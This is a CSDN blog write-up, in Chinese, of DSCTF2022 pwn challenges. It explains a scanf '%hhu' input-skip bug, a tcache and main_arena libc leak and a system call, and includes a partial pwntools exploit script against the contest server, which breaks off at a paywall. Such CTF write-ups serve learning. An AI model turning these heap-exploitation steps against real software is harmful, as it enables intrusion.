【DSCTF2022】pwn补题记录

最新推荐文章于 2023-05-12 09:04:15 发布
最新推荐文章于 2023-05-12 09:04:15 发布
阅读量1.4k 收藏
点赞数
分类专栏: pwn 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/125992500
版权
本文详细记录了DSCTF2022中pwn题目fuzzerinstrospector和rusty的解题过程。在fuzzerinstrospector中,通过利用堆管理漏洞,包括tcache队列填充、main_arena地址泄露和system函数调用。而在rusty中,分析了Rust程序的四个主要功能,利用off-by-null方法实现堆溢出,通过malloc hook修改onegadget。解题过程中涉及动态调试、libc地址泄露和fastbin attack等技术。
摘要由CSDN通过智能技术生成

fuzzerinstrospector

题目的功能很好分析,但是漏洞点之前没有见过,根据程序流程发现是scanf("%hhu"&x);存在漏洞,可以再每次新申请堆的时候跳过写入内容,保留原有堆的值。%hhu代表unsigned char,在输入为±符号的时候,输入是跳过的,并且不影响后续的程序流
我的解题思路

  • 第一步:申请9个堆,然后释放9个堆,让tcache的队列填满
  • 第二步:申请7个堆,这个时候tcache会在最开始接近top chunk的7、8编号堆进行合并,并且保留main_arena地址
  • 第三步:利用scanf的漏洞保留main_arena值,并且通过map表泄露
  • 第四步:利用隐藏的功能实现system函数调用
# -*- coding: utf-8 -*-
from pwn  import *
import pwnlib
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
#context_terminal = ["terminator","-x","sh","-c"]

def FuzzerBitmap_Creatio(index,content,bitmap,mod):
	conn.recvuntil("Your choice:")
	conn.sendline("1")
	conn.recvuntil("Index:")
	conn.sendline(str(index))
	for i in range(0,8):
		conn.recvuntil(":")
		if mod:
			conn.sendline(str(ord(content[i])))
		else:
			conn.sendline(content[i])
	conn.recvuntil("Bitmap:")
	conn.send(bitmap.ljust(0x100,"\x00"))


def Edit_FuzzerBitmap(index,content,bitmap):
	conn.recvuntil("Your choice:")
	conn.sendline("2")
	conn.recvuntil("Index:")
	conn.sendline(str(index))
	for i in range(0,8):
		conn.recvuntil(":")
		conn.sendline(str(ord(content[i])))
	conn.recvuntil("Bitmap:")
	conn.send(bitmap.ljust(0x100,"\x00"))


def Check_FuzzerBitmap(index):
    conn.recvuntil("Your choice:")
    conn.sendline("3")
    conn.recvuntil("Index:")
    conn.sendline(str(index))


def Delete_FuzzerBitmap(index):
    conn.recvuntil("Your choice:")
    conn.sendline("4")
    conn.recvuntil("Index:")
    conn.sendline(str(index))

def Attack(paylaod):
    conn.recvuntil("Your choice:")
    conn.sendline("6")
    conn.sendline(str(paylaod))

if __name__ == '__main__':
	HOST = '39.105.185.193'
	PORT = 30007
	conn = remote(HOST ,PORT)
	#conn = process(['/home/assassin/Desktop/program/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so','./ciscn_final_3'], env = {'LD_PRELOAD' : '/home/assassin/Desktop/program/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so'})
	#conn = process(['/home/assassin/Desktop/program/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so','./mrctf2020_shellcode_revenge'], env = {'LD_PRELOAD' : '/home/assassin/Desktop/program/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'})
	#conn = process("./fuzzerinstrospector")  
	#pwnlib.gdb.attach(conn,"b main") #b *0x400ECF
	pause()
	table = ""
	for i in range(0,256):
		table += chr(i)
	FuzzerBitmap_Creatio(0,"A"*8,table,1)
	FuzzerBitmap_Creatio(1,"B"*8,table,1)
	FuzzerBitmap_Creatio(2,"C"*8,table,1)
	FuzzerBitmap_Creatio(3,"D"*8,table,1)
	FuzzerBitmap_Creatio(4,"D"*8,table,1)
	FuzzerBitmap_Creatio(5,"D"*8,table,1)
	FuzzerBitmap_Creatio(6,"D"*8,table,1)
	FuzzerBitmap_Creatio(7,"D"*8,table,1)
	FuzzerBitmap_Creatio(8,"D"*8,table,1)
	
	Delete_FuzzerBitmap(0)
	Delete_FuzzerBitmap(1)
	Delete_FuzzerBitmap(2)
	Delete_FuzzerBitmap(3)
	Delete_FuzzerBitmap(4)
	Delete_FuzzerBitmap(5)
	Delete_FuzzerBitmap(6)
	Delete_FuzzerBitmap(7)
	Delete_FuzzerBitmap(8)
	
	FuzzerBitmap_Creatio(0,"+"*8,table,0)
	FuzzerBitmap_Creatio(1,"+"*8,table,0)
	FuzzerBitmap_Creatio(2,"+"*8,table,
最低0.47元/天 解锁文章
Assassin__is__me
关注
专栏目录
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2251
2022 CISCN 初赛pwn的完整wp
*CTF 2022 pwn examination
weixin_46483787的博客
04-17 505
题目主要实现了两个角色,每个角色四五个功能,漏洞点主要有以下几点: 当学生的question_number为1,并且pray过一次,老师在给分的时候就会扣十分,由于question_number为1,所以分数会模10,即小于10,减10之后发生负溢出,变成个很大的数。 从而可以进入这里的功能: 这里可以泄露堆地址,并且可以让一个已知地址指向的值加一 然后是这里: 这里可以修改一个堆地址的低1字节,从而修改堆块结构,将下一个chunk的size改大,释放后将libc内地址踩进可控堆块,泄露libc。 然
Pwn patch用法
Helloity的博客
07-27 738
IDA Patch使用
2022 DSCTF首届数字空间安全攻防大赛 部分题解
weixin_51122085的博客
07-18 1553
2022DSCTF部分题解
2022年全国职业院校技能大赛(中职组)网络安全竞赛试题(9)
君逍遥o
05-12 405
2022年全国职业院校技能大赛(中职组)网络安全竞赛试题(9)
【2022 DSCTF决赛wp】
qq_45603443的博客
08-04 925
2022 DSCTF决赛wp
强网杯2022 pwn 赛题解析.docx
最新发布
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
warmup pwn入门题
02-11
pwn入门题
2022ISCC PWN
山高路远
07-05 2177
2022ISCC
Rust环境配置
m0_52310911的博客
08-09 583
本文简要介绍了Rust的win环境配置,以及在VScode中运行第一个Rust程序。
ctf pwn 个人经验记录
jmp esp
05-22 8903
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
随便谈谈Rust错误处理
jmp esp
02-08 6227
错误处理? 其实我一直不能太分清楚什么是错误什么是异常,不过我倒是觉得区分这些个东西意义不大,重要的是认清本质。一个程序在运行过程中总会碰到一些错误,有的是因为用户的不当操作,有的是因为期望的结果没有发生,当然还有直接就是无法恢复的程序bug,无论如何,这些问题,如果我们考虑到了,都是需要一套解决方案的,所以我们就来稍微谈谈这些解决方法,还有我最近学到Rust的解决方法。 从Error Cod...
【Rust大法】Rust环境搭建
https://github.com/Wheeeeeeeeels
09-27 992
Rust大法第之Rust环境搭建 Deepin 操作系统:15.10 步骤: 第一步:加入中国科技大学网络镜像代理 export RUSTUP_DIST_SERVER=https://mirrors.ustc.edu.cn/rust-static export RUSTUP_UPDATE_ROOT=https://mirrors.ustc.edu.cn/rust-static/rustup ...
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2277
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
攻防世界新手区pwn writeup
极客剑寮
09-08 939
CGfsb 题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050 下载文件后,使用file命令查看。 32位的文件,用ida打开,F5查看伪代码。 printf漏洞:https://www.cnblogs.com/cfans1993/articles...
rust编程语言_Mozilla的Rust编程语言处于关键阶段
cumo7370的博客
06-03 250
rust编程语言 在今年的Great Wide Open会议上 ,Steve Klabnik谈到了Mozilla的Rust编程语言 。 Klabnik以前撰写了Rust入门教程,标题为Rust for Rubyists ,这个演讲也有类似目的。 但是,这次演讲不是针对Ruby,而是针对一般程序员。 因此,演讲的主题是: $ LANGUAGE-ists的Rust 。 Klabnik的演讲包括三...
Rust学习笔记基础篇1--环境的搭建(霜之小刀)
lihn1987的博客
04-14 1814
Rust学习笔记基础篇1–环境的搭建(霜之小刀) 欢迎转载和引用,若有问题请联系 若有疑问,请联系 Email : lihn1011@163.com QQ:2279557541 1 环境搭建 1.1 rust安装 这里我使用的是mac就以mac为例来说了,直接命令行运行(这条命令来自于rust的官网https://www.rust-lang.org...
BUUCTF pwn wp 116 - 120
fa1c4的blog
03-06 418
[BSidesCF 2019]Runit [BSidesCF 2019]Runit$ file runit;checksec runit runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值